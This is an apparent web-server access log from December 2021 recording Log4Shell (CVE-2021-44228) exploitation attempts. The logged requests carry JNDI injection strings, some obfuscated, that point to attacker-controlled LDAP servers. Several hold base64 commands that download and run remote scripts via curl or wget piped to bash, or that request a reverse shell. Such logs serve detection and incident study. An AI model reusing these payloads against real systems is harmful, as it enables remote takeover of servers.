128.90.61.199 - - [14/Dec/2021:13:42:11 +0000] "GET //$%7Bjndi:iiop://128.90.61.199:5456/1639489266%7D HTTP/1.1" 404 241 "${jndi:iiop://128.90.61.199:5456/1639489266}" "${jndi:iiop://128.90.61.199:5456/1639489266}"
157.245.108.125 - - [14/Dec/2021:21:21:51 +0000] "GET / HTTP/1.0" 301 225 "-" "borchuk/3.1 ${jndi:ldap://167.99.32.139:1389/Basic/ReverseShell/167.99.32.139/9999}"
195.54.160.149 - - [14/Dec/2021:21:31:34 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [14/Dec/2021:21:31:34 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
194.233.164.95 - - [15/Dec/2021:06:41:49 +0000] "GET / HTTP/1.1" 302 203 "${jndi:dns://50-116-41-48.scanworld.net/ref}" "${jndi:dns://50-116-41-48.scanworld.net/ua}"
172.104.152.7 - - [15/Dec/2021:10:10:18 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://172.104.152.7/a}"
107.170.69.93 - - [15/Dec/2021:11:24:42 +0000] "GET /${jndi:ldap://45.83.193.150:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
107.170.69.93 - - [15/Dec/2021:11:24:42 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.83.193.150:1389/Exploit}"
185.220.101.191 - - [15/Dec/2021:13:22:37 +0000] "GET /?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D HTTP/1.1" 302 262 "${jndi:ldap://193.3.19.159:53/c}" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
45.56.80.11 - - [15/Dec/2021:15:18:32 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://162.55.90.26/846473520/C}"
195.54.160.149 - - [15/Dec/2021:18:24:27 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [15/Dec/2021:18:24:27 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
139.59.70.139 - - [16/Dec/2021:02:58:17 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://159.223.5.30:443/}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:443/}"
195.54.160.149 - - [16/Dec/2021:05:22:24 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
139.59.70.139 - - [16/Dec/2021:05:56:20 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://159.223.5.30:1389/a}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a}"
139.59.70.139 - - [16/Dec/2021:06:13:13 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://159.223.5.30:1389/a}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a}"
195.54.160.149 - - [16/Dec/2021:14:50:58 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [16/Dec/2021:14:50:58 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
34.80.118.173 - - [16/Dec/2021:17:40:41 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 404 238 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
34.80.118.173 - - [16/Dec/2021:17:40:42 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
45.83.66.82 - - [17/Dec/2021:04:24:14 +0000] "GET /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-r6nowiqxeuo7ofx3%7D HTTP/1.1" 302 319 "${${::-j}ndi:dns://45.83.64.1/securityscan-dm2egfzz5rjlkg4q}" "${${::-j}ndi:dns://45.83.64.1/securityscan-nw5iv33sovrub3sa}"
137.184.218.211 - - [17/Dec/2021:05:14:08 +0000] "GET / HTTP/1.0" 400 226 "${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}" "ekausif/3.1 ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}"
1.116.59.211 - - [17/Dec/2021:08:14:04 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
1.116.59.211 - - [17/Dec/2021:08:14:04 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
137.184.218.211 - - [17/Dec/2021:08:25:27 +0000] "GET / HTTP/1.0" 301 225 "${jndi:ldap://159.223.5.30:1389/o=reference,payload=itzbenz.payload.RickRoll}" "borchuk/3.1 ${jndi:ldap://159.223.5.30:1389/o=reference,payload=itzbenz.payload.RickRoll}"
195.54.160.149 - - [17/Dec/2021:11:17:52 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [17/Dec/2021:11:17:53 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.83.66.20 - - [17/Dec/2021:15:23:42 +0000] "GET /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-76cc6qxmgtpsktk6%7D HTTP/1.1" 400 226 "${${::-j}ndi:dns://45.83.64.1/securityscan-jrkvebyqhye2ghdy}" "${${::-j}ndi:dns://45.83.64.1/securityscan-ufnjkk7ymvziepfo}"
62.76.41.46 - - [17/Dec/2021:20:57:40 +0000] "GET /?x=${jndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo} HTTP/1.1" 302 358 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}"
62.76.41.46 - - [17/Dec/2021:20:57:41 +0000] "GET /?x=$%7bjndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}"
109.237.96.124 - - [17/Dec/2021:20:59:12 +0000] "GET /?x=${jndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo} HTTP/1.1" 302 358 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}"
109.237.96.124 - - [17/Dec/2021:20:59:13 +0000] "GET /?x=$%7bjndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://194.40.243.149:1534/Basic/Command/Base64/KGN1cmwgLXMgMTk0LjQwLjI0My4xNDkvbGguc2h8fHdnZXQgLXEgLU8tIDE5NC40MC4yNDMuMTQ5L2xoLnNoKXxiYXNo}"
170.210.45.163 - - [17/Dec/2021:21:04:05 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 404 238 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [17/Dec/2021:21:04:05 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
95.173.156.193 - - [17/Dec/2021:22:13:34 +0000] "GET / HTTP/1.1" 200 96 "ff=${jndi:ldap://103.104.73.155:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}" "ff=${jndi:ldap://103.104.73.155:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}"
95.173.156.193 - - [17/Dec/2021:22:13:34 +0000] "POST / HTTP/1.1" 200 96 "ff=${jndi:ldap://103.104.73.155:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}" "ff=${jndi:ldap://103.104.73.155:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}"
95.173.156.193 - - [17/Dec/2021:22:13:35 +0000] "GET / HTTP/1.1" 200 96 "ff=${jndi:ldap://103.104.73.155:1389/Deserialization/CommonsCollectionsK2/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}" "ff=${jndi:ldap://103.104.73.155:1389/Deserialization/CommonsCollectionsK2/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}"
195.54.160.149 - - [17/Dec/2021:22:44:13 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
36.138.125.108 - - [17/Dec/2021:23:11:15 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 404 238 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
36.138.125.108 - - [17/Dec/2021:23:11:16 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
178.176.203.190 - - [18/Dec/2021:04:13:14 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
178.176.203.190 - - [18/Dec/2021:04:13:14 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
178.176.203.190 - - [18/Dec/2021:04:13:14 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 302 249 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
195.54.160.149 - - [18/Dec/2021:18:35:20 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
66.249.66.198 - - [19/Dec/2021:03:47:24 +0000] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 302 276 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.30 - - [19/Dec/2021:03:47:25 +0000] "GET /$%7Bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.54.160.149 - - [19/Dec/2021:03:53:00 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
178.176.203.190 - - [19/Dec/2021:07:46:10 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 404 238 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
178.176.203.190 - - [19/Dec/2021:07:46:10 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
107.189.29.181 - - [19/Dec/2021:14:10:44 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://179.43.175.101:1389/jedmdg}"
195.54.160.149 - - [19/Dec/2021:14:55:50 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
